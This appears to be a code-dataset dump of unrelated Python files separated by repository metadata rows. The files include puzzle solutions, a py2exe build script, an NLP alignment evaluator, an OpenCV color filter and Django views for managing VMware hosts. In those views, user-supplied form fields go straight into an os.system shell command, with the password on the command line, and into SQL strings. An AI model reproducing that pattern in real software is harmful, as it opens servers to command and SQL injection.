return [p for p in params if isinstance(p['msg'], Propagate)]
def recvdPropagate(node: TestNode):
return getAllArgs(node,
TestNode.processPropagate)
def recvdRequest(node: TestNode):
return getAllArgs(node,
TestNode.processRequest)
def forwardedRequest(node: TestNode):
return getAllArgs(node,
TestNode.forward)
| [
"[email protected]"
] | |
7d3f4e0a5031f9ce618c568b440c7425489060a1 | 16631cf7cd4a70f2cd2750851649d3eff5e17724 | /2019/day06/part1.py | d5325cb19e7543fcf23dde0b345f5a8f5535efa1 | [] | no_license | kynax/AdventOfCode | 1dd609a3308d733f2dd7d4ea00508d2da73180b9 | 36a339241dd7a31ebe08a73e5efa599e5faeea1a | refs/heads/master | 2022-12-21T13:32:52.591068 | 2022-12-16T22:41:30 | 2022-12-16T22:41:30 | 48,439,585 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,048 | py | import sys
class Obj:
def __init__(self, name):
self.name = name
self.down = []
def add_child(self, obj):
self.down.append(obj)
def prnt(self, prev):
if not self.down:
print(prev + '=' + self.name)
else:
for d in self.down:
d.prnt(prev + '-' + self.name)
def distance(self, start):
d = start
if not self.down:
print(self.name, start)
for n in self.down:
d += n.distance(start + 1)
return d
COM = Obj('COM')
orbits = {}
orbits['COM'] = COM
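# Each stdin line has the form "A)B", meaning object B directly orbits A;
# the total printed below is the sum of every object's orbit depth.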
effects = [x.strip().split(')') for x in list(sys.stdin)]
for c,o in effects:
obj = None
if o in orbits:
obj = orbits[o]
else:
obj = Obj(o)
orbits[o] = obj
if c in orbits:
orbits[c].add_child(obj)
else:
ctr = Obj(c)
ctr.add_child(obj)
orbits[c] = ctr
print(COM.distance(0))
| [
"[email protected]"
] | |
dc099d384ffc6b9326adbfb10628a62857513c67 | cbc829f5787b770c9184b91ee470d058cc4cbe65 | /backtrack/46_全排列.py | b21c5927665b36a64df5503725fa3d085639de52 | [] | no_license | SilvesSun/learn-algorithm-in-python | 58815e7e85e767cbc4a9c21e36e7bdede4f32bef | 5ba3465ba9c85955eac188e1e3793a981de712e7 | refs/heads/master | 2022-09-19T05:10:26.783943 | 2022-09-10T04:56:43 | 2022-09-10T04:56:43 | 115,470,779 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 613 | py | class Solution(object):
def permute(self, nums):
"""
:type nums: List[int]
:rtype: List[List[int]]
"""
if not nums:
            return []
res = []
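        # Backtracking: choose one remaining element, recurse on the rest,
        # then undo the choice (track.pop()) before trying the next option.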
def backtrack(_nums, track):
if not _nums:
res.append(track[:])
return
for i in range(len(_nums)):
track.append(_nums[i])
backtrack(_nums[:i] + _nums[i+1:], track)
track.pop()
backtrack(nums, [])
return res
if __name__ == '__main__':
s = Solution()
print(s.permute([1, 2, 3])) | [
"[email protected]"
] | |
6d58a136326125dd005d704027df47e4a4e76d85 | f03064e9f7fbd5d0344812fae45439905627f2a8 | /helga/general/setup/helga_launcher/setup.py | 4b09fe648d4121ba266e1af75a5d51617b7b9c7d | [] | no_license | tws0002/helga | 45324a4acfde5054c452329de8cfdd38de4f8bda | 80f44393a5f1b3038d4ce3dc5057989ad7d3ef28 | refs/heads/master | 2021-01-12T17:21:04.802566 | 2015-04-16T20:39:06 | 2015-04-16T20:39:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,150 | py |
"""
setup
=====
Helper module for py2exe to build a distribution.
-----------------------
**Author:** `Timm Wagener <mailto:[email protected]>`_
"""
#win32com py2exe shell fix
#------------------------------------------------------------------
try:
#import module finder
try:
#from py2exe
import py2exe.mf as modulefinder
except ImportError:
#else default
import modulefinder
#default imports
import win32com
import sys
for path in win32com.__path__[1:]:
modulefinder.AddPackagePath("win32com", path)
for extra in ["win32com.shell"]: #,"win32com.mapi"
__import__(extra)
m = sys.modules[extra]
for path in m.__path__[1:]:
modulefinder.AddPackagePath(extra, path)
except ImportError:
# no build path setup, no worries.
pass
#Import
#------------------------------------------------------------------
#python
import sys
import os
from distutils.core import setup
from glob import glob
import shutil
#py2exe
import py2exe
#Import protection
#------------------------------------------------------------------
if (__name__ == '__main__'):
#Only execute script if it is not imported
#Variables
#------------------------------------------------------------------
#application_name
application_name = 'HelgaLauncher'
#application_version
application_version = '0.1'
#author_name
author_name = 'Timm Wagener'
#msvc_library_directory
msvc_library_directory = r'C:/Program Files (x86)/Microsoft Visual Studio 9.0/VC/redist/amd64/Microsoft.VC90.CRT'
#include_list
include_list = ['sip']
#exclude_list
exclude_list = ['PyQt4.uic.port_v3']
#dll_exclude_list
dll_exclude_list = ['MSVCP90.dll']
#data_files_list
data_files_list = [
('media', ['media/helga_launcher.ui']),
('media/icons', ['media/icons/icon_helga_launcher.png',
'media/icons/icon_dcc_button_maya.png',
'media/icons/icon_dcc_button_maya_hover.png',
'media/icons/icon_dcc_button_maya_drag.png',
'media/icons/icon_dcc_button_houdini.png',
'media/icons/icon_dcc_button_houdini_hover.png',
'media/icons/icon_dcc_button_houdini_drag.png',
'media/icons/icon_dcc_button_nuke.png',
'media/icons/icon_dcc_button_nuke_hover.png',
'media/icons/icon_dcc_button_nuke_drag.png',
'media/icons/icon_dcc_button_hiero.png',
'media/icons/icon_dcc_button_hiero_hover.png',
'media/icons/icon_dcc_button_hiero_drag.png',
'media/icons/icon_dcc_button_doc.png',
'media/icons/icon_dcc_button_doc_hover.png',
'media/icons/icon_dcc_button_doc_drag.png'
]),
('data', ['data/pipeline_base_data.yaml',
'data/pipeline_base_data_sandbox.yaml',
'data/pipeline_base_data_home.yaml',
'data/pipeline_base_data_home_sandbox.yaml'
])
]
#MSVC Libraries
#------------------------------------------------------------------
#if msvc_library_directory exists copy .dlls into py2exe bundle
if (os.path.isdir(msvc_library_directory)):
#msvc_library_tuple
msvc_library_tuple = ("Microsoft.VC90.CRT", glob(msvc_library_directory + r'/*.*'))
#append
data_files_list.append(msvc_library_tuple)
#setup
#------------------------------------------------------------------
#options_dict
options_dict = dict(
ascii = False, # Exclude encodings
includes = include_list,
excludes = exclude_list, # Exclude standard library
dll_excludes = dll_exclude_list, # Exclude 'MSVCP90.dll'
compressed = True, # Compress library.zip
dist_dir = application_name
)
#build_dict
build_dict = dict(
build_base = application_name + '_build'
)
#setup
setup(
name = application_name,
version = application_version,
description = 'Pipeline tools launcher.',
author = author_name,
console = ['helga_launcher_loader.py'],
data_files = data_files_list,
options = {
'build': build_dict,
'py2exe': options_dict
}
)
#Remove build directory
#------------------------------------------------------------------
try:
#setup_module_file
setup_module_file = os.path.realpath(sys.argv[0])
#setup_module_dir
setup_module_dir = os.path.dirname(setup_module_file)
#batch_dir
build_dir = os.path.join(setup_module_dir, application_name + '_build')
#if build_dir exists delete
if(os.path.isdir(build_dir)):
shutil.rmtree(build_dir)
#log
print('\n\nSuccessfully deleted build directory: {0}'.format(build_dir))
except:
#log
print('Error deleting build directory')
#Create batches
#------------------------------------------------------------------
def create_batch(helga_launcher_path,
batch_dir,
batch_name,
command_line_arg_list = []):
"""
Create helga launcher batch (No UNC/relative pathes allowed)
"""
try:
#batch_file_path
batch_file_path = os.path.join(batch_dir, batch_name)
#command
command = helga_launcher_path
#add command line args
for argument in command_line_arg_list:
command += argument
#batch_file
with open(batch_file_path, 'w+') as batch_file:
#write
batch_file.write(command)
except:
#log
print('Error creating batch file')
try:
#batch_dir_name
batch_dir_name = 'batch'
#setup_module_file
setup_module_file = os.path.realpath(sys.argv[0])
#setup_module_dir
setup_module_dir = os.path.dirname(setup_module_file)
#final_dir
final_dir = os.path.join(setup_module_dir, application_name)
#batch_dir
batch_dir = os.path.join(final_dir, batch_dir_name)
#if batch dir exists, rebuild
if (os.path.isdir(batch_dir)):
#delete
shutil.rmtree(batch_dir)
#recreate
os.makedirs(batch_dir)
#helga_launcher_path
helga_launcher_path = r'Y:/Production/scripts/deploy/helga/bin/HelgaLauncher/helga_launcher_loader.exe'
#helga_launcher_path_sandbox
helga_launcher_path_sandbox = r'Y:/Production/scripts/sandbox/helga/bin/HelgaLauncher/helga_launcher_loader.exe'
#helga_launcher_path_home
helga_launcher_path_home = r'C:/symlinks/filmaka/helga/Production/scripts/deploy/helga/bin/HelgaLauncher/helga_launcher_loader.exe'
#helga_launcher
#------------------------------------------------------------------
#helga_launcher
batch_name = 'helga_launcher.bat'
create_batch(helga_launcher_path, batch_dir, batch_name)
#helga_launcher_maya
batch_name = 'helga_launcher_maya.bat'
create_batch(helga_launcher_path, batch_dir, batch_name, [r' -rma 1'])
#helga_launcher_nuke
batch_name = 'helga_launcher_nuke.bat'
create_batch(helga_launcher_path, batch_dir, batch_name, [r' -rnk 1'])
#helga_launcher_houdini
batch_name = 'helga_launcher_houdini.bat'
create_batch(helga_launcher_path, batch_dir, batch_name, [r' -rho 1'])
#helga_launcher_sandbox
#------------------------------------------------------------------
#helga_launcher_sandbox
batch_name = 'helga_launcher_sandbox.bat'
create_batch(helga_launcher_path_sandbox, batch_dir, batch_name, [r' -sbx 1'])
#helga_launcher_sandbox_maya
batch_name = 'helga_launcher_sandbox_maya.bat'
create_batch(helga_launcher_path_sandbox, batch_dir, batch_name, [r' -sbx 1', r' -rma 1'])
#helga_launcher_sandbox_nuke
batch_name = 'helga_launcher_sandbox_nuke.bat'
create_batch(helga_launcher_path_sandbox, batch_dir, batch_name, [r' -sbx 1', r' -rnk 1'])
#helga_launcher_sandbox_houdini
batch_name = 'helga_launcher_sandbox_houdini.bat'
create_batch(helga_launcher_path_sandbox, batch_dir, batch_name, [r' -sbx 1', r' -rho 1'])
#helga_launcher home
#------------------------------------------------------------------
#helga_launcher_home
batch_name = 'helga_launcher_home.bat'
create_batch(helga_launcher_path_home, batch_dir, batch_name,
[r' --custom_yaml_path "C:/symlinks/filmaka/helga/Production/scripts/deploy/helga/bin/HelgaLauncher/data/pipeline_base_data_home.yaml"'])
#helga_launcher_home_maya
batch_name = 'helga_launcher_home_maya.bat'
create_batch(helga_launcher_path_home, batch_dir, batch_name,
[r' --custom_yaml_path "C:/symlinks/filmaka/helga/Production/scripts/deploy/helga/bin/HelgaLauncher/data/pipeline_base_data_home.yaml"',
r' -rma 1'])
#helga_launcher_home_houdini
batch_name = 'helga_launcher_home_houdini.bat'
create_batch(helga_launcher_path_home, batch_dir, batch_name,
[r' --custom_yaml_path "C:/symlinks/filmaka/helga/Production/scripts/deploy/helga/bin/HelgaLauncher/data/pipeline_base_data_home.yaml"',
r' -rho 1'])
#helga_launcher_home_nuke
batch_name = 'helga_launcher_home_nuke.bat'
create_batch(helga_launcher_path_home, batch_dir, batch_name,
[r' --custom_yaml_path "C:/symlinks/filmaka/helga/Production/scripts/deploy/helga/bin/HelgaLauncher/data/pipeline_base_data_home.yaml"',
r' -rnk 1'])
#helga_launcher home sandbox
#------------------------------------------------------------------
#helga_launcher_home_sandbox
batch_name = 'helga_launcher_home_sandbox.bat'
create_batch(helga_launcher_path_home, batch_dir, batch_name,
[r' --custom_yaml_path "C:/symlinks/filmaka/helga/Production/scripts/deploy/helga/bin/HelgaLauncher/data/pipeline_base_data_home_sandbox.yaml"'])
#helga_launcher_home_sandbox_maya
batch_name = 'helga_launcher_home_sandbox_maya.bat'
create_batch(helga_launcher_path_home, batch_dir, batch_name,
[r' --custom_yaml_path "C:/symlinks/filmaka/helga/Production/scripts/deploy/helga/bin/HelgaLauncher/data/pipeline_base_data_home_sandbox.yaml"',
r' -rma 1'])
#helga_launcher_home_sandbox_houdini
batch_name = 'helga_launcher_home_sandbox_houdini.bat'
create_batch(helga_launcher_path_home, batch_dir, batch_name,
[r' --custom_yaml_path "C:/symlinks/filmaka/helga/Production/scripts/deploy/helga/bin/HelgaLauncher/data/pipeline_base_data_home_sandbox.yaml"',
r' -rho 1'])
#helga_launcher_home_sandbox_nuke
batch_name = 'helga_launcher_home_sandbox_nuke.bat'
create_batch(helga_launcher_path_home, batch_dir, batch_name,
[r' --custom_yaml_path "C:/symlinks/filmaka/helga/Production/scripts/deploy/helga/bin/HelgaLauncher/data/pipeline_base_data_home_sandbox.yaml"',
r' -rnk 1'])
#log
print('\n\nSuccessfully created batches in: {0}'.format(batch_dir))
except:
#log
print('Error creating batches')
| [
"[email protected]"
] | |
fb8563d0c86c07072a406d9224c99e1ca35ca5d4 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03433/s237464773.py | d74c7e1f2fe58c4046b4f3fe80fc54c3b637c0f6 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 77 | py | x, a = [int(input()) for i in range(2)]
print("Yes" if a >= x%500 else "No" ) | [
"[email protected]"
] | |
01c6a82363241a9064bcdc20ba495dec968eb0ca | 9461195cac30788855359753ac2856d746e81cd6 | /apps/estado_flujo/forms.py | 4e5747b61b4e54b2f824df8dd33ccf4402278ed3 | [] | no_license | ChristianSmith18/python-project | e15460b29e29a6bb841c82a762618f7ff86ab724 | 76d876f3fded93643af58e65f183bb6403beb755 | refs/heads/master | 2023-04-30T15:30:48.472909 | 2021-05-24T17:33:46 | 2021-05-24T17:33:46 | 370,433,052 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 484 | py | from django import forms
from apps.estado_flujo.models import Glo_EstadoFlujo
class estadoFlujoForm(forms.ModelForm):
class Meta:
model = Glo_EstadoFlujo
fields = [
'descripcion_estado',
'estado',
]
widgets = {
'descripcion_estado': forms.TextInput(attrs={'class': 'form-control'}),
'estado': forms.TextInput(attrs={'class': 'form-control','type':'number'}),
}
| [
"[email protected]"
] | |
6d2e0a26d4c7ad4f0faf749760e2e908565be54d | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_splotches.py | ed0d1adf3f190745463d7e746b1ad80895ac0e75 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 247 | py |
from xai.brain.wordbase.nouns._splotch import _SPLOTCH
# class header
class _SPLOTCHES(_SPLOTCH, ):
def __init__(self,):
_SPLOTCH.__init__(self)
self.name = "SPLOTCHES"
self.specie = 'nouns'
self.basic = "splotch"
self.jsondata = {}
| [
"[email protected]"
] | |
88dfa41087978b540b432a730f6068e9e609f5bc | 2edfa18568b02e63757da73254c09e195b9f4efa | /evaluation/nejm/evaluate.py | 7e2fcaf57a3bb27d779b4998aa9d3e4d76e406dd | [] | no_license | boxiangliu/ParaMed | 65e67977c88c1ce2166d08d6d40a33f6961a3486 | 08484488f4829bf144303a2e348c79e4e2ae5f71 | refs/heads/master | 2023-05-02T22:14:31.911384 | 2021-05-15T21:44:51 | 2021-05-15T21:44:51 | 217,118,327 | 19 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,436 | py | import argparse
import os
import pandas as pd
pd.options.display.max_columns = 99
import numpy as np
from collections import defaultdict
parser = argparse.ArgumentParser(description="Generate precision-recall "\
"table for sentence alignments.")
parser.add_argument("--align_fn", type=str, help="Path to ground-truth "\
"alignment file.")
parser.add_argument("--en_fn", type=str, help="Path to English sentences.")
parser.add_argument("--zh_fn", type=str, help="Path to Chinese sentences.")
parser.add_argument("--pred_fn", type=str, help="Path to prediction sentence.")
parser.add_argument("--out_fn", type=str, help="Path to output precision "\
"recall table.")
args = parser.parse_args()
os.makedirs(os.path.dirname(args.out_fn), exist_ok=True)
# Example
# args = argparse.Namespace(align_fn="../data/wmt19_biomed_modified/align_validation_zh_en.txt",
# en_fn="../data/wmt19_biomed_modified/medline_zh2en_en.txt",
# zh_fn="../data/wmt19_biomed_modified/medline_zh2en_zh.txt",
# pred_fn="../data/wmt19_biomed_modified/align_bleualign_zh_en.txt",
# out_fn="../processed_data/evaluation/wmt19_biomed/evaluate/bleualign.pr")
def align_en_zh(align, en, zh):
align["zh"] = [x.split(" <=> ")[0] for x in align["align"]]
align["en"] = [x.split(" <=> ")[1] for x in align["align"]]
docs = align.doc.unique()
alignment = defaultdict(list)
for doc in docs:
e = en[en.doc == doc]
z = zh[zh.doc == doc]
a = align[align.doc == doc]
if e.shape[0] == 0 or z.shape[0] == 0:
continue
for i, j, status in \
zip(a["zh"], a["en"], a["status"]):
zh_sent = ""
en_sent = ""
for v in i.split(","):
if v != "omitted":
v = int(v) - 1
zh_sent += z["sent"].iloc[v]
for w in j.split(","):
if w != "omitted":
w = int(w) - 1
en_sent += e["sent"].iloc[w]
alignment["doc"].append(doc)
alignment["align"].append("{} <=> {}".format(i,j))
alignment["status"].append(status)
alignment["zh"].append(zh_sent)
alignment["en"].append(en_sent)
alignment = pd.DataFrame(alignment)
return alignment
def read_data(args):
shape_getter = pd.read_table(args.align_fn, nrows=10)
ncol = shape_getter.shape[1]
print(f"{ncol} columns detected in alignment file.")
if ncol == 3:
align = pd.read_table(args.align_fn, names=["doc", "align", "status"])
elif ncol == 4:
align = pd.read_table(args.align_fn, names=["pmid", "doc", "align", "status"])
else:
raise ValueError(f"Column = {ncol} has not been implemented.")
if args.en_fn is not None and args.zh_fn is not None:
en = pd.read_table(args.en_fn, names=["doc", "sent_id", "sent"])
zh = pd.read_table(args.zh_fn, names=["doc", "sent_id", "sent"])
align = align_en_zh(align, en, zh)
else:
en = None
zh = None
return align, en, zh
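# align_type (below) normalizes an alignment string into a size label, e.g.
# "1,2 <=> 1" becomes "1 - 2" and "omitted <=> 3" becomes "0 - 1".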
def align_type(x):
out = []
for i in x:
        if pd.isna(i):  # robust NaN test; `i is np.NaN` misses float('nan')
out.append(np.NaN)
else:
src, tgt = i.split(" <=> ")
if src == "omitted":
src_len = 0
else:
src_len = len(src.split(","))
if tgt == "omitted":
tgt_len = 0
else:
tgt_len = len(tgt.split(","))
min_len = min(src_len, tgt_len)
max_len = max(src_len, tgt_len)
out.append("{} - {}".format(min_len, max_len))
return out
def get_precision_recall(valid, pred):
types = valid["type"].unique()
print(f"Alignment types: {types}", flush=True)
def paste(x):
return ":".join([x["doc"], x["align"]])
pr_table = defaultdict(list)
for _type in types:
try:
valid_of_type = valid[valid["type"] == _type].\
apply(lambda x: paste(x), axis=1).tolist()
pred_of_type = pred[pred["type"] == _type].\
apply(lambda x: paste(x), axis=1).tolist()
TP = sum([x in pred_of_type for x in valid_of_type])
FN = sum([x not in pred_of_type for x in valid_of_type])
FP = sum([x not in valid_of_type for x in pred_of_type])
precision = TP / (TP + FP)
recall = TP / (TP + FN)
pr_table["type"].append(_type)
pr_table["precision"].append(precision)
pr_table["recall"].append(recall)
except:
print(f"Type {_type} not found.")
pr_table = pd.DataFrame(pr_table)
return pr_table
def main():
valid, en, zh = read_data(args)
pred = pd.read_table(args.pred_fn,
names=["doc", "align","status", "zh", "en"])
valid["type"] = align_type(valid["align"])
pred["type"] = align_type(pred["align"])
pr_table = get_precision_recall(valid, pred)
pr_table.to_csv(args.out_fn, sep="\t", index=False)
if __name__ == "__main__":
main()
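# Example invocation (illustrative; the file paths are assumptions):
#   python evaluation/nejm/evaluate.py \
#       --align_fn data/align_validation_zh_en.txt \
#       --en_fn data/medline_zh2en_en.txt --zh_fn data/medline_zh2en_zh.txt \
#       --pred_fn data/align_pred_zh_en.txt --out_fn out/pred.pr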
| [
"[email protected]"
] | |
eed94a71c7239fbdd541de9a4417a48de3d95475 | ab670d6e59ebd4a0c23fa867fb77866d223163da | /Python/Problem029.py | 7fedb1207b0e2cc07512acac43d00c69115028a9 | [] | no_license | JeromeLefebvre/ProjectEuler | 18799e85947e378e18839704c349ba770af4a128 | 3f16e5f231e341a471ffde8b0529407090920b56 | refs/heads/master | 2020-07-05T02:42:44.844607 | 2014-07-26T01:04:38 | 2014-07-26T01:04:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 760 | py |
'''
Distinct powers
Problem 29
Consider all integer combinations of a^b for 2 ≤ a ≤ 5 and 2 ≤ b ≤ 5:
2^2=4, 2^3=8, 2^4=16, 2^5=32
3^2=9, 3^3=27, 3^4=81, 3^5=243
4^2=16, 4^3=64, 4^4=256, 4^5=1024
5^2=25, 5^3=125, 5^4=625, 5^5=3125
If they are then placed in numerical order, with any repeats removed, we get the following sequence of 15 distinct terms:
4, 8, 9, 16, 25, 27, 32, 64, 81, 125, 243, 256, 625, 1024, 3125
How many distinct terms are in the sequence generated by a^b for 2 ≤ a ≤ 100 and 2 ≤ b ≤ 100?
'''
from itertools import product
def problem29():
return len({a ** b for a, b in product(range(2, 100 + 1), range(2, 100 + 1))})
if __name__ == "__main__":
print(problem29() == 9183)
from cProfile import run
run("problem29()")
| [
"[email protected]"
] | |
3bf61bbfa5ba4d78c42105bc36280e5ed2f3f3b2 | 34c01d4bf7ae13b15bfbcfd90ff39f5353971820 | /examples/reactive.py | cb3d656e3187fae427834a62122f2958b8199bf1 | [] | no_license | nvbn/microasync | c78d8684119fe6cbcd1ece762a15d64940ff9eb6 | 9e4975ed5077f133051bc80c1d54042dac5b78c7 | refs/heads/master | 2021-01-23T08:56:52.382753 | 2014-10-23T20:13:49 | 2014-10-23T20:13:49 | 23,565,211 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,559 | py | from microasync.async import coroutine, as_chan, Channel, do_all, select
from microasync.device import get_switch, get_output_pin
@as_chan(Channel)
def get_bicolor_led(chan, left, right):
left_pin = get_output_pin(left)
right_pin = get_output_pin(right)
while True:
msg = yield chan.get()
print(msg)
if msg == 'red':
yield do_all(left_pin.put(1),
right_pin.put(0))
elif msg == 'green':
yield do_all(left_pin.put(0),
right_pin.put(1))
elif msg == 'yellow':
yield do_all(left_pin.put(1),
right_pin.put(1))
elif msg == 'none':
yield do_all(left_pin.put(0),
right_pin.put(0))
@as_chan(Channel)
def switchable_filter(chan, orig_chan, fn):
select_ch = select(get_switch(), chan)
enabled = False
while True:
result_ch, val = yield select_ch.get()
if result_ch == chan:
if not enabled or fn(val):
yield orig_chan.put(val)
else:
enabled = not enabled
@coroutine
def main():
first_led = switchable_filter(get_bicolor_led('X1', 'X2'),
lambda msg: msg != 'red')
second_led = switchable_filter(get_bicolor_led('X3', 'X4'),
lambda msg: msg == 'red')
while True:
for led in (first_led, second_led):
for mode in ('red', 'green', 'yellow', 'none'):
yield led.put(mode)
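# Note: this module only defines the coroutine; in microasync examples the
# scheduler is normally started explicitly, roughly like this (API assumed
# from other examples in the repo -- verify against your microasync version):
#   from microasync.async import loop
#   main()
#   loop()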
| [
"[email protected]"
] | |
0f7b6291b1f5cf75ec7597313122777012517352 | f875b0d80254c8f6eee4e5887869442a8abf60e4 | Official_OpenCV_Docs/Image_Processing_In_OpenCV/changing_color_spaces.py | 2065a51ee24f675278df82863552b3ccb6733902 | [] | no_license | AmitKulkarni23/OpenCV | 6d9320fa9e4fd41af4806cda6df0fb2c641d7884 | 449468f4c9c84ffb5b66ab352086e5b23f342b45 | refs/heads/master | 2020-03-19T12:36:23.305898 | 2018-09-16T00:53:51 | 2018-09-16T00:53:51 | 136,528,669 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,703 | py | # Python file which captures video from the camera and displays only the red color
# Everything else is blacked out
# OpenCV has >150 color spaces
# But 2 of the important ones are BGR -> HSV and BGR -> Gray
# Changing colorspaces - uses the cv2.cvtColor API
# Why HSV for color detection?
# It helps in pinpointing a more specific color
# What is HSV -> Hue, Saturation and Value
# Hue - color
# Saturation - strength of the color
# Value - for light
# Credits: https://pythonprogramming.net/color-filter-python-opencv-tutorial/
###################################
import cv2
import numpy as np
# Create a VideoCapture object
cap = cv2.VideoCapture(0)
while 1:
    # Read frame-by-frame from the camera
_, frame = cap.read()
# Change to hsv colorspace
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
# Specify red ranges
lower_red = np.array([30,150,50])
upper_red = np.array([255,255,180])
# So we will be seeing anything in the ranges of 30-255, 150-255 and 50-180
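    # Note: OpenCV hue values run 0-179, so these bounds (hue 30-255) are very
    # loose and pass far more than pure red. A tighter red filter would combine
    # two masks around the hue wrap (illustrative bounds, tune per scene):
    #   mask1 = cv2.inRange(hsv, np.array([0, 120, 70]), np.array([10, 255, 255]))
    #   mask2 = cv2.inRange(hsv, np.array([170, 120, 70]), np.array([179, 255, 255]))
    #   mask = cv2.bitwise_or(mask1, mask2)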
    # The mask created using inRange is either true or false,
    # i.e. black or white (see the mask image for more clarity)
mask = cv2.inRange(hsv, lower_red, upper_red)
# This is our result
# we show color where there is the frame AND the mask.
# The white part of the mask will be red range, that was converted to pure white, while everything else became black.
res = cv2.bitwise_and(frame,frame, mask= mask)
cv2.imshow('Original Video',frame)
cv2.imshow('Mask using inRange',mask)
cv2.imshow('Resultant Video',res)
k = cv2.waitKey(5) & 0xFF
# Break out of while loop on press of 'ESC'
if k == 27:
break
cv2.destroyAllWindows()
cap.release()
| [
"[email protected]"
] | |
eab66c8739d2f800e313c946eeac35d82206b0f6 | 2b832e5d3d88b25998f44d21fdb3fa40c2072a9e | /testcase/api/__init__.py | fb1bdccf22a848238c4b584cbd9bcd23639dd0a1 | [
"MIT"
] | permissive | lijunzhe123/Automation | 387536505e0b77fd9cc1d7dc9d017dc1268925eb | 18122ce2c5debe485fab7dac5f8007f4b7b2d51f | refs/heads/main | 2023-06-17T10:04:51.296922 | 2021-07-10T17:58:56 | 2021-07-10T17:58:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 170 | py | #!/usr/bin/env python3
# -*- encoding: utf-8 -*-
'''
@author: yuejl
@application:
@contact: [email protected]
@file: __init__.py.py
@time: 2021/7/8 0008 20:59
@desc:
''' | [
"[email protected]"
] | |
6755d6111619f91330fb2eb1521513e7e2fdf071 | c5e5b2052c56e76ba4f33b36aeff26df3ac6ffb4 | /VM/views.py | f5eab429b8b4f3b2e749d2006b7cefdb15f237c1 | [] | no_license | willcai1984/Connect | c7d6d60cc8201820feb08ca61b48a2e5645ab5b6 | d89fea4964519639056ae89c311adc1a7f68a1e0 | refs/heads/master | 2016-09-05T17:30:36.449016 | 2015-03-03T09:11:16 | 2015-03-03T09:11:16 | 28,028,452 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,431 | py | # -*- coding: utf-8 -*-
from django.shortcuts import render_to_response
from django.template.loader import get_template
from django.template import Context
from django.http import HttpResponse
import sys, re, os, simplejson, time
from django.db import connection
def vm_manage(request):
t = get_template('html/VM/vmware_manage.html')
html = t.render(Context({'':''}))
return HttpResponse(html)
def vm_connect(request):
ip = request.POST['ip']
user = request.POST['user']
passwd = request.POST['passwd']
sql_name = 'h' + ip.replace('.', '_')
logfile, stdfile = _log()
exec_cli_list = ['export PYTHONPATH=$PYTHONPATH:/home/will/git/;']
exec_cli_list.append("/usr/bin/python /home/will/git/VMware/scripts/vm_db.py --debug info")
exec_cli_list.append('-i ' + ip)
exec_cli_list.append('-u ' + user)
exec_cli_list.append('-p ' + passwd)
exec_cli_list.append('-l ' + logfile)
exec_cli_list.append('--parameters sql.name=' + sql_name)
exec_cli_list.append("1>" + stdfile + " 2>&1")
exec_cli = ' '.join(exec_cli_list)
print '''Exec CLI is: ''' + exec_cli
os.system(exec_cli)
cursor = connection.cursor()
cursor.execute("use vmware")
cursor.execute("select * from %s where flag = 1 order by display" % sql_name)
vmid_dis_reg_power_flag_tuple = cursor.fetchall()
vmid_list = []
dis_list = []
reg_list = []
power_list = []
flag_list = []
for vmid, dis, reg, power, flag in vmid_dis_reg_power_flag_tuple:
if vmid:
vmid_list.append(vmid)
dis_list.append(dis)
reg_list.append(reg)
power_list.append(power)
flag_list.append(flag)
result = {u"length":len(vmid_list)}
vmid_s = ','.join(vmid_list)
if type(vmid_s) != type(u''):
result[u"vmid_list"] = unicode(vmid_s, errors='ignore')
else:
result[u"vmid_list"] = vmid_s
dis_s = ','.join(dis_list)
if type(dis_s) != type(u''):
result[u"dis_list"] = unicode(dis_s, errors='ignore')
else:
result[u"dis_list"] = dis_s
reg_s = ','.join(reg_list)
if type(reg_s) != type(u''):
result[u"reg_list"] = unicode(reg_s, errors='ignore')
else:
result[u"reg_list"] = reg_s
power_s = ','.join(power_list)
if type(power_s) != type(u''):
result[u"power_list"] = unicode(power_s, errors='ignore')
else:
result[u"power_list"] = power_s
#print str(result)
result_json = simplejson.dumps(result)
# print "Json data is '%s'" % result_json
return HttpResponse(result_json, content_type='application/javascript')
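# The JSON payload consumed by the page looks roughly like this (illustrative
# values only):
#   {"length": 2, "vmid_list": "16,32", "dis_list": "vm-a,vm-b",
#    "reg_list": "a.vmx,b.vmx", "power_list": "on,off"}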
def vm_refrash(request):
ip = request.POST['ip']
sql_name = 'h' + ip.replace('.', '_')
cursor = connection.cursor()
cursor.execute("use vmware")
cursor.execute("select * from %s where flag = 1 order by display" % sql_name)
vmid_dis_reg_power_flag_tuple = cursor.fetchall()
vmid_list = []
dis_list = []
reg_list = []
power_list = []
flag_list = []
for vmid, dis, reg, power, flag in vmid_dis_reg_power_flag_tuple:
if vmid:
vmid_list.append(vmid)
dis_list.append(dis)
reg_list.append(reg)
power_list.append(power)
flag_list.append(flag)
result = {u"length":len(vmid_list)}
vmid_s = ','.join(vmid_list)
if type(vmid_s) != type(u''):
result[u"vmid_list"] = unicode(vmid_s, errors='ignore')
else:
result[u"vmid_list"] = vmid_s
dis_s = ','.join(dis_list)
if type(dis_s) != type(u''):
result[u"dis_list"] = unicode(dis_s, errors='ignore')
else:
result[u"dis_list"] = dis_s
reg_s = ','.join(reg_list)
if type(reg_s) != type(u''):
